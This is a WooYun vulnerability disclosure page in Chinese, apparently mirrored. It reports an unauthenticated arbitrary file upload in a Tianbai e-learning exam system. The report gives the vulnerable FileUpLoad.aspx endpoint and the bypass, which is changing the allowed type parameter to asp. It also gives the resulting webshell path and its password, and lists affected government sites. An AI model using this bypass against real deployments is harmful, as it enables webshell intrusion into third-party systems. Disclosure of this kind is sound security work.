某E-learning产品任意文件上传GetShell（无需登录）

2015年6月10日08:39:39评论417 views字数 260阅读0分52秒阅读模式

摘要

2014-09-06：细节已通知厂商并且等待厂商处理中
2014-09-09：厂商已经确认，细节仅向厂商公开
2014-09-12：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-11-03：细节向核心白帽子及相关领域专家公开
2014-11-13：细节向普通白帽子公开
2014-11-23：细节向实习白帽子公开
2014-12-03：细节向公众公开

漏洞概要关注数(15) 关注此漏洞

漏洞标题：某E-learning产品任意文件上传GetShell（无需登录）

漏洞作者：魇

提交时间： 2014-09-06 12:56

公开时间： 2014-12-03 12:58

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

2人收藏

漏洞详情

披露状态：

简要描述：

据说是市场上最畅销的E-learning产品，用户超5000家
上个漏洞提交后进行复测，发现存在另外一处上传，虽然有限制，但是可以绕过，且无需登录，并且影响多数政府案例

详细说明：

http://**.**.**.**/bugs/wooyun-2010-074865

上个漏洞搜索引擎语法以及案例都提供了，这次就不再列举了....也走前台吧

上海天柏信息科技有限公司官网：http://**.**.**.**/

成功案例：http://**.**.**.**/Customer.html

产品：天柏在线考试系统（政府版）

部分实例仅供cncert国家互联网应急中心测试：

http://**.**.**.**/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 官网demo

http://**.**.**.**:38501/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 福建省林业厅

**.**.**.**/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 重庆市卫生监督网络培训平台

http://**.**.**.**//GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 江西省总工会在线培训学习系统

**.**.**.**:801/GovUserControl/FileUpLoad.aspx?type=jpg,jpeg,bmp,gif,png&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu%20Sep%2004%202014%2010%3A42%3A43%20GMT%2B0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4) 北京天正合商业秘密保护咨询服务中心

中共高台县委党校在线学习系统

漏洞证明：

实例演示

直接访问：

限制了上传格式，不过可以绕过，将type=jpg修改为asp

上传后响应中返回了路径：

http://**.**.**.**:38501/Upload/GovCwImg//yan.asp

再示例3个

http://**.**.**.**/Upload/GovCwImg//yan.asp 密码：pass

**.**.**.**/Upload/GovCwImg//yan.asp

http://**.**.**.**/GovUserControl/FileUpLoad.aspx?type=asp%2cjpeg%2cbmp%2cgif%2cpng&preference=1&formatType=img&targetFile=GovCwImg&openFile=GovCwImg&t=Thu+Sep+04+2014+10%3a42%3a43+GMT%2b0800+(%u4e2d%u56fd%u6807%u51c6%u65f6%u95f4)+%u6590%u7136%u516c%u52a1%u5458%u57f9%u8bad

http://**.**.**.**/Upload/GovCwImg//yan.asp

我之前提供的关键词可能不是较为准确..，不过量确实是大的

修复方案：

先下发涉及的站点吧..

版权声明：转载请注明来源魇@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-09-09 08:54

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-04 12:59 | 超威蓝猫 ( 核心白帽子 | Rank:1133 漏洞数:122 | STEAM_0:0:55968383)

1

辣鸡晖不分钱持积极

1# 回复此人
2014-09-04 13:17 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子，但是除了他华...)

0

@超威蓝猫小胖别闹..

2# 回复此人
2014-09-04 13:33 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

0

这东西早就玩烂了

3# 回复此人

漏洞概要 关注数(15) 关注此漏洞

缺陷编号： WooYun-2014-75008

漏洞标题： 某E-learning产品任意文件上传GetShell（无需登录）

相关厂商： 上海天柏信息科技有限公司

漏洞作者： 魇

提交时间： 2014-09-06 12:56

公开时间： 2014-12-03 12:58

漏洞类型： 文件上传导致任意代码执行

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 任意文件上传 任意文件上传

2人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 魇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(15) 关注此漏洞

漏洞标题：某E-learning产品任意文件上传GetShell（无需登录）

相关厂商：上海天柏信息科技有限公司

漏洞作者：魇

漏洞类型：文件上传导致任意代码执行

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：任意文件上传任意文件上传

版权声明：转载请注明来源魇@乌云

漏洞评价(共0人评价):

登陆后才能进行评分